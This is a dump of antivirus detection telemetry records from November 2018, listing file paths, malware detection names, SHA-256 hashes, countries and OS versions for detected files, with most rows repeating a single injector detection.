  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055811-3fcd40aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055811-3FCD40AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T115154-02944/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:30:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055242-7c012ee9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055242-7C012EE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125453-dc6f7f4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125453-DC6F7F4F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:58:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:13:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100349-b25e251d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6753014b\\AVSCAN-20181102-095756-7E5B2B66\\AVSCAN-20181102-100349-B25E251D', filesize=3048000, name='PUA/OptimizerPro.EL.#M1.#R1'), hash='5af93e6ff45cc76344145b925c780481e30b394e7a79254dc2d2bf7e09720551', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:03:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182435-bd9a9fa8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b05066eb\\AVSCAN-20181102-181715-87F04E33\\AVSCAN-20181102-182435-BD9A9FA8', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='6017dd10735dac5985fe35c2116b71680b87d0144ec074e27c7827febc7b61f4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:24:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T08:12:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gfx.exe', filepath='I:\\ألعاب\\Games 1\\بولنج\\MIXOLGY.NET_Bowling.Hawaiian.Vacationd. _By  MIDOPOP\\gfx\\gfx.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='50b1bf2fd333fc92463a627064936a9efb4d13f4dd8282a16d7b2e0063762871', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061902-29c7b375', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061902-29C7B375', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf tender document.tar --> j111.exe', filepath='pdf TENDER DOCUMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:30:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ijiinisy.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\IjiiNisY.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ntmerung.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\NTMeRUNG.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='movies.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\MOVIES\\MOVIES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='73c18cbaed5b72e91c293bb70286ab85930974b6506bb75dd1c85b9728e9d665', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061941-40c60cd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061941-40C60CD0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rad5c902.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\rad5C902.tmp.exe', filesize=192000, name='TR/Crypt.XPACK.4d0fc7.#M1.#R1'), hash='4d0fc7144beedb0620a8f17931a6969970ed17c42d65de92cf54157233c0cc5a', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050258-89200c27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050258-89200C27', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053145-8e99f791', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053145-8E99F791', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155507-b5e01b05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-155507-B5E01B05', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052258-544e3e79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052258-544E3E79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054236-12fe6f73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054236-12FE6F73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052216-3b472b59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052216-3B472B59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061938-3ee73c4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061938-3EE73C4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053518-0d9b3631', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053518-0D9B3631', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055540-e6241377', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055540-E6241377', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053544-1d162e84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053544-1D162E84', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052657-e301d0a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052657-E301D0A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060359-0fa28a19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060359-0FA28A19', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060428-20c9ce5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060428-20C9CE5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055000-1b1ab1c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055000-1B1AB1C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053007-5460085a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053007-5460085A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052351-745ac739', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052351-745AC739', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053058-72b481f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053058-72B481F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055536-e3c4f021', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055536-E3C4F021', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054034-ca12e683', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054034-CA12E683', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062416-e5028c49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062416-E5028C49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051310-f6267b68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051310-F6267B68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051620-673accb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051620-673ACCB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055326-96706da5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055326-96706DA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050913-68b6e4ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050913-68B6E4CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052134-22485a92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052134-22485A92', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060338-02e99179', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060338-02E99179', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052658-e37ff746', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052658-E37FF746', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050925-6fbbecd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050925-6FBBECD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060554-54417e2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060554-54417E2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050936-76723627', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050936-76723627', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061538-afdb3aca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061538-AFDB3ACA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062435-f04c3090', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062435-F04C3090', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051449-3100ef9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051449-3100EF9B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061553-b8f7461c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061553-B8F7461C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054833-e7b621cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054833-E7B621CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053318-c5f21ff2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053318-C5F21FF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:16Z'), dt=datetime.date(2018, 11, 2)),
